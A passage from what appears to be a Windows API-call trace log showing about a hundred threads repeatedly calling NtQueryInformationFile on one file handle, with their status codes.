FileInformation=0x208e20) returned 0x0 Thread: id = 185 os_tid = 0x158 [0160.909] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa70, FileInformation=0x208e20) returned 0x0 Thread: id = 186 os_tid = 0x6cc [0160.911] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfa98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfa98, FileInformation=0x208e20) returned 0x0 Thread: id = 187 os_tid = 0x694 [0160.913] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369ff18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369ff18, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 188 os_tid = 0x6d8 [0160.915] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9d8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9d8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 189 os_tid = 0x87c [0160.917] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfb98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfb98, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 190 os_tid = 0xb88 [0160.919] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f800, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f800, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 191 os_tid = 0xb8c [0160.920] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f810, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f810, FileInformation=0x208e20) returned 0x0 Thread: id = 192 os_tid = 0x700 [0160.922] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb88, FileInformation=0x208e20) returned 0x0 Thread: id = 193 os_tid = 0x6f0 [0160.924] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa60, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 194 os_tid = 0x130 [0160.926] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffb68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffb68, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 195 os_tid = 0x754 [0160.928] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fee8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fee8, FileInformation=0x208e20) returned 0x0 Thread: id = 196 os_tid = 0x72c [0160.929] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fdb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fdb0, FileInformation=0x208e20) returned 0x0 Thread: id = 197 os_tid = 0x748 [0160.931] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fa48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fa48, FileInformation=0x208e20) returned 0x0 Thread: id = 198 os_tid = 0x928 [0160.933] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fce8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fce8, FileInformation=0x208e20) returned 0x0 Thread: id = 199 os_tid = 0xcc [0160.935] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfce0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfce0, FileInformation=0x208e20) returned 0x0 Thread: id = 200 os_tid = 0xd0 [0160.937] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fde0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fde0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 201 os_tid = 0xd4 [0160.939] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe10, FileInformation=0x208e20) returned 0x0 Thread: id = 202 os_tid = 0xd8 [0160.941] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe70, FileInformation=0x208e20) returned 0x0 Thread: id = 203 os_tid = 0xdc [0160.943] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f9b8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f9b8, FileInformation=0x208e20) returned 0x0 Thread: id = 204 os_tid = 0xe0 [0160.949] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb38, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 205 os_tid = 0xe4 [0160.951] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35fff60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35fff60, FileInformation=0x208e20) returned 0x0 Thread: id = 206 os_tid = 0xe8 [0160.953] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb28, FileInformation=0x208e20) returned 0x0 Thread: id = 207 os_tid = 0xec [0160.955] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe18, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 208 os_tid = 0x9d8 [0160.961] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa00, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 209 os_tid = 0x898 [0160.963] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fbb0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fbb0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 210 os_tid = 0x48c [0160.965] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f930, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f930, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 211 os_tid = 0x6a4 [0160.967] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb98, FileInformation=0x208e20) returned 0x0 Thread: id = 212 os_tid = 0x20c [0160.969] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fcf0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fcf0, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 213 os_tid = 0x704 [0160.975] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fc08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fc08, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 214 os_tid = 0x568 [0160.977] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfbc8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfbc8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 215 os_tid = 0x5ac [0160.983] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f8c8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f8c8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 216 os_tid = 0x908 [0160.989] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f998, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f998, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 217 os_tid = 0x888 [0160.993] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd48, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 218 os_tid = 0x544 [0160.995] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfd08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfd08, FileInformation=0x208e20) returned 0x0 Thread: id = 219 os_tid = 0x76c [0160.997] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfce8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfce8, FileInformation=0x208e20) returned 0x0 Thread: id = 220 os_tid = 0xa9c [0160.999] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa40, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa40, FileInformation=0x208e20) returned 0x0 Thread: id = 221 os_tid = 0x114 [0161.001] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fed8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fed8, FileInformation=0x208e20) returned 0x0 Thread: id = 222 os_tid = 0x5b8 [0161.002] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f900, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f900, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 223 os_tid = 0x814 [0161.004] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f900, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f900, FileInformation=0x208e20) returned 0x0 Thread: id = 224 os_tid = 0x834 [0161.006] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfb48, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfb48, FileInformation=0x208e20) returned 0x0 Thread: id = 225 os_tid = 0x884 [0161.008] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f990, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f990, FileInformation=0x208e20) returned 0x0 Thread: id = 226 os_tid = 0x5d4 [0161.010] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc08, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc08, FileInformation=0x208e20) returned 0x0 Thread: id = 227 os_tid = 0x340 [0161.012] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fd00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fd00, FileInformation=0x208e20) returned 0x0 Thread: id = 228 os_tid = 0x810 [0161.013] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f7a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f7a8, FileInformation=0x208e20) returned 0x0 Thread: id = 229 os_tid = 0x830 [0161.015] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf8e8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf8e8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 230 os_tid = 0x880 [0161.017] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fee8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fee8, FileInformation=0x208e20) returned 0x0 Thread: id = 231 os_tid = 0xae4 [0161.019] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffbd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffbd8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 232 os_tid = 0x570 [0161.021] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfbb8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfbb8, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 233 os_tid = 0xb40 [0161.022] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf980, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf980, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 234 os_tid = 0x5f4 [0161.024] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fc28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fc28, FileInformation=0x208e20) returned 0x0 Thread: id = 235 os_tid = 0xbb8 [0161.026] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fc28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fc28, FileInformation=0x208e20) returned 0x0 Thread: id = 236 os_tid = 0x598 [0161.028] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373ff80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373ff80, FileInformation=0x208e20) returned 0x0 Thread: id = 237 os_tid = 0x4e4 [0161.030] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe00, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe00, FileInformation=0x208e20) returned 0x0 Thread: id = 238 os_tid = 0xbfc [0161.032] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffab0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffab0, FileInformation=0x208e20) returned 0x0 Thread: id = 239 os_tid = 0x80c [0161.033] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fa80, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fa80, FileInformation=0x208e20) returned 0x0 Thread: id = 240 os_tid = 0xbf8 [0161.039] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe70, FileInformation=0x208e20) returned 0x0 Thread: id = 241 os_tid = 0x524 [0161.040] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf858, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf858, FileInformation=0x208e20) returned 0x0 Thread: id = 242 os_tid = 0x674 [0161.042] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fcc0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fcc0, FileInformation=0x208e20) returned 0x0 Thread: id = 243 os_tid = 0x4a0 [0161.044] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f810, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f810, FileInformation=0x208e20) returned 0x0 Thread: id = 244 os_tid = 0x5d8 [0161.046] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe50, FileInformation=0x208e20) returned 0x0 Thread: id = 245 os_tid = 0x788 [0161.048] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ffaa0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ffaa0, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 246 os_tid = 0x69c [0161.050] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df878, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df878, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 247 os_tid = 0x6a8 [0161.052] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb38, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb38, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 248 os_tid = 0x500 [0161.053] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fa70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fa70, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 249 os_tid = 0x4e0 [0161.055] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfc50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfc50, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 250 os_tid = 0x330 [0161.057] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375ff18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375ff18, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 251 os_tid = 0xa30 [0161.059] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fe98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fe98, FileInformation=0x208e20) returned 0x0 Thread: id = 252 os_tid = 0xb50 [0161.061] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfba0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfba0, FileInformation=0x208e20) returned 0x0 Thread: id = 253 os_tid = 0xb70 [0161.063] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367ff78, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367ff78, FileInformation=0x208e20) returned 0x0 Thread: id = 254 os_tid = 0xb6c [0161.069] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfdd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfdd8, FileInformation=0x208e20) returned 0x0 Thread: id = 255 os_tid = 0xb74 [0161.070] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fbd8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fbd8, FileInformation=0x208e20) returned 0x0 Thread: id = 256 os_tid = 0xb68 [0161.072] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fba8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fba8, FileInformation=0x208e20) returned 0x0 Thread: id = 257 os_tid = 0x758 [0161.074] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f7a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f7a8, FileInformation=0x208e20) returned 0x0 Thread: id = 258 os_tid = 0x3d4 [0161.076] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f9a8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f9a8, FileInformation=0x208e20) returned 0x0 Thread: id = 259 os_tid = 0x484 [0161.078] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bfad0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bfad0, FileInformation=0x208e20) returned 0x0 Thread: id = 260 os_tid = 0xb4c [0161.080] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fee8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fee8, FileInformation=0x208e20) returned 0x0 Thread: id = 261 os_tid = 0xa1c [0161.082] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa10, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa10, FileInformation=0x208e20) returned 0x0 Thread: id = 262 os_tid = 0x2ac [0161.084] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fae0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fae0, FileInformation=0x208e20) returned 0x0 Thread: id = 263 os_tid = 0xa8c [0161.086] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fee0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fee0, FileInformation=0x208e20) returned 0x0 Thread: id = 264 os_tid = 0x68c [0161.091] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fba0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fba0, FileInformation=0x208e20) returned 0x0 Thread: id = 265 os_tid = 0x388 [0161.094] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd20, FileInformation=0x208e20) returned 0x0 Thread: id = 266 os_tid = 0xa50 [0161.095] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f8b8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f8b8, FileInformation=0x208e20) returned 0x0 Thread: id = 267 os_tid = 0x75c [0161.097] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f918, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f918, FileInformation=0x208e20) returned 0x0 Thread: id = 268 os_tid = 0x240 [0161.099] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357f830, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357f830, FileInformation=0x208e20) returned 0x0 Thread: id = 269 os_tid = 0x320 [0161.101] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359f7d8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359f7d8, FileInformation=0x208e20) returned 0x0 Thread: id = 270 os_tid = 0x3b4 [0161.102] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fba0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fba0, FileInformation=0x208e20) returned 0x0 Thread: id = 271 os_tid = 0x760 [0161.104] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc28, FileInformation=0x208e20) returned 0x0 Thread: id = 272 os_tid = 0xb00 [0161.106] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fa30, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fa30, FileInformation=0x208e20) returned 0x0 Thread: id = 273 os_tid = 0x7fc [0161.108] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fb90, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fb90, FileInformation=0x208e20) returned 0x0 Thread: id = 274 os_tid = 0xb18 [0161.110] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f8e8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f8e8, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 275 os_tid = 0xa68 [0161.112] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fa18, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fa18, FileInformation=0x208e20) returned 0xc0000002 Thread: id = 276 os_tid = 0x224 [0161.114] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfad8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfad8, FileInformation=0x208e20) returned 0x0 Thread: id = 277 os_tid = 0x2c4 [0161.116] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375f798, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375f798, FileInformation=0x208e20) returned 0x0 Thread: id = 278 os_tid = 0x24c [0161.117] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fe60, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fe60, FileInformation=0x208e20) returned 0x0 Thread: id = 279 os_tid = 0x4e8 [0161.119] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fa90, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fa90, FileInformation=0x208e20) returned 0x0 Thread: id = 280 os_tid = 0x220 [0161.121] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fbf0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fbf0, FileInformation=0x208e20) returned 0x0 Thread: id = 281 os_tid = 0xb04 [0161.123] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fc58, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fc58, FileInformation=0x208e20) returned 0x0 Thread: id = 282 os_tid = 0x180 [0161.125] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363fba0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363fba0, FileInformation=0x208e20) returned 0x0 Thread: id = 283 os_tid = 0x53c [0161.127] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361f928, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361f928, FileInformation=0x208e20) returned 0x0 Thread: id = 284 os_tid = 0x5b4 [0161.130] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bf7d8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bf7d8, FileInformation=0x208e20) returned 0x0 Thread: id = 285 os_tid = 0x614 [0161.131] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bff68, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bff68, FileInformation=0x208e20) returned 0x0 Thread: id = 286 os_tid = 0x690 [0161.133] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fc90, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fc90, FileInformation=0x208e20) returned 0x0 Thread: id = 287 os_tid = 0x440 [0161.135] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9b0, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9b0, FileInformation=0x208e20) returned 0xc0000003 Thread: id = 288 os_tid = 0x7d8 [0161.137] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357ff50, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357ff50, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 289 os_tid = 0xa60 [0161.139] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfe28, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfe28, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 290 os_tid = 0xb24 [0161.140] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc88, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc88, FileInformation=0x208e20) returned 0xc0000010 Thread: id = 291 os_tid = 0x878 [0161.142] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc70, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc70, FileInformation=0x208e20) returned 0x0 Thread: id = 292 os_tid = 0xb1c [0161.145] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fdb8, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fdb8, FileInformation=0x208e20) returned 0x0 Thread: id = 293 os_tid = 0xb08 [0161.147] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfe20, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfe20, FileInformation=0x208e20) returned 0x0 Thread: id = 294 os_tid = 0x4fc [0161.148] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fe98, FileInformation=0x208e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fe98, 